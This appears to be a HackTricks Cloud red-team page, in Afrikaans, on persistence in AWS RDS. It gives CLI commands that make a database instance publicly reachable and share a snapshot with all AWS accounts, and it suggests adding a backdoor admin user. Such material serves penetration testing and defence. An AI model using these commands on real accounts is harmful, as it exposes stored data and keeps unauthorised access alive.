AWS - RDS Persistence
Tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
RDS
Vir meer inligting, sien:
AWS - Relational Database (RDS) Enum
Maak instansie publiek toeganklik: rds:ModifyDBInstance
’n aanvaller met hierdie toestemming kan ’n bestaande RDS-instansie wysig om publieke toeganklikheid moontlik te maak.
aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately
Skep ’n admin gebruiker in die DB
’n aanvaller kan net ’n gebruiker in die DB skep, sodat selfs as die wagwoord van die master-gebruiker gewysig word, hy nie toegang tot die database verloor nie.
Maak snapshot publiek
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
Tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
HackTricks Cloud

